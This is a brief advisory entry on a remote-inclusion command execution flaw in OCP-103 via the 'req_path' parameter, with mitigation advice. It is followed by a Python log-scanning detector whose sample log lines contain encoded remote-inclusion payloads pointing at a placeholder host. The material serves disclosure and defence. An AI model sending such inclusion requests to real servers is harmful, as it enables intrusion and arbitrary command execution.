Vendor: OCP-103
By: Unknown
CVSS: 7.5 (HIGH)
Command Execution
CWE: 78
Product Name: OCP-103
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2004
Command Execution Vulnerability in OCP-103
The OCP-103 application is vulnerable to command execution due to improper handling of user input. By manipulating the 'req_path' parameter and injecting malicious code through the 'funcs.php' script on an evil host, an attacker can execute arbitrary commands on the target system. The provided example demonstrates how to execute the 'ls' command on the target system.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in system commands. Additionally, the application should implement proper access controls to restrict unauthorized access to the 'req_path' parameter.
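A detection sketch for the request pattern described above, as an added example that is not part of the original advisory: it scans web access logs for 'req_path' values that reference another host or climb out of the application directory. The combined log format, the /app.php script name and host.example are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines; /app.php and host.example are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /app.php?req_path=inc/ HTTP/1.1" 200 512
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /app.php?req_path=http%3A%2F%2Fhost.example%2F HTTP/1.1" 200 1290
192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /app.php?req_path=http%253A%252F%252Fhost.example%252F HTTP/1.1" 200 1733
192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /app.php?page=2 HTTP/1.1" 200 300
192.0.2.78 - - [01/Jan/2024:10:02:00 +0000] "GET /app.php?req_path=../../tmp/ HTTP/1.1" 404 0
"""

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme ("http:", "ftp:", "php:"), a protocol-relative "//", or a UNC "\\" prefix.
REMOTE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

def classify(value):
    """Return (reason, decoded value) if a req_path value is suspicious, else None."""
    for _ in range(3):  # undo layered percent-encoding before judging
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if REMOTE.match(value):
        return "remote-reference", value
    if ".." in re.split(r"[\\/]", value):
        return "path-traversal", value
    return None

def scan(log_text):
    """Return (client, reason, decoded value) for each suspicious req_path."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get("req_path", []):
            verdict = classify(value)
            if verdict:
                findings.append((client, *verdict))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same `classify` rules can back a server-side allowlist check: a legitimate 'req_path' should only ever be a fixed, local, relative directory.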